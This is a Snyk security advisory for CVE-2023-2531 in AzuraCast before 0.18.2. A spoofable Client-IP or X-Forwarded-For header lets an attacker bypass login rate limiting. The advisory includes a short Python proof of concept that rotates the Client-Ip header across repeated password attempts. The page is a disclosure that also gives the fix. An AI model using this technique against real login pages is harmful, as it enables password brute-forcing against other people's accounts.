Brute Force Affecting azuracast/azuracast package, versions <0.18.2
Snyk CVSS
Attack Complexity
Low
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.1% (41st
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-AZURACASTAZURACAST-5497341
- published 5 May 2023
- disclosed 5 May 2023
- credit TsarSec
Introduced: 5 May 2023
CVE-2023-2531 Open this link in a new tabHow to fix?
Upgrade azuracast/azuracast to version 0.18.2 or higher.
Overview
Affected versions of this package are vulnerable to Brute Force such that the getIp() function first checks for a value inside non-default headers like Client-IP or X-Forwarded-For which can contain arbitrary contents. This allows an attacker to randomly generate a new value for any of these headers on each subsequent request to completely bypass the rate-limiting.
PoC
import requests
login_url = "http://localhost/login"
data = {"username":"root@localhost.local", "password": "xxx"}
for i in range(0,100):
print(i)
r = requests.post(login_url, data=data)
if "You have attempted" in r.text:
print(f"hit rate limiting after {i} tries")
break
# now try with a randomized CLIENT_IP header
for i in range(0,100):
print(i)
headers = {"Client-Ip" : str(i)}
print(headers)
r = requests.post(login_url, data=data, headers=headers)
if "You have attempted" in r.text:
print(f"hit rate limiting after {i} tries")
exit()